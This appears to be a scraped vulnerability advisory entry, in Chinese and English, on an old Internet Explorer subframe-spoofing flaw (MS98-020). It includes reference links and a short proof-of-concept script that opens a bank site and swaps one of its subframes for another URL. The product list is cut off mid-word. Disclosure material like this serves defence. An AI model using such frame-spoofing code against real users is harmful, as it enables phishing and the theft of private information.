https://www.exploit-db.com/exploits/19662
https://www.securityfocus.com/bid/88094
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199812-007

InternetExplorer3.x至4.01版本存在漏洞。远程攻击者可以向另一网站的帧插入任意恶意内容，也称为帧欺骗。

Internet Explorer 4.1 for Windows 95/Windows 98/Windows NT 4,Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4,Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0 Subframe Spoofing Vulnerability

source: http://www.securityfocus.com/bid/855/info

IE's default security settings allow a malicious webpage to open a new browser, open another site's main frame in that new browser and then set any subframes to a URL of their choosing. This could lead to misappropriation of private information, among other problems. 

<SCRIPT>
b=window.open("http://www.citybank.com");
function g()
{
b.frames[2].location="http://www.yahoo.com";
}
setTimeout("g()",6000);
</SCRIPT>

Microsoft Internet Explorer 3.0.2 for Windows NT 4.0

–

Microsoft Windows NT 4.0

–

Microsoft Windows NT 4.0

Microsoft Internet Explorer 3.0.1 fo

来源:MS
名称:MS98-020
链接:http://www.microsoft.com/technet/security/bulletin/ms98-020.mspx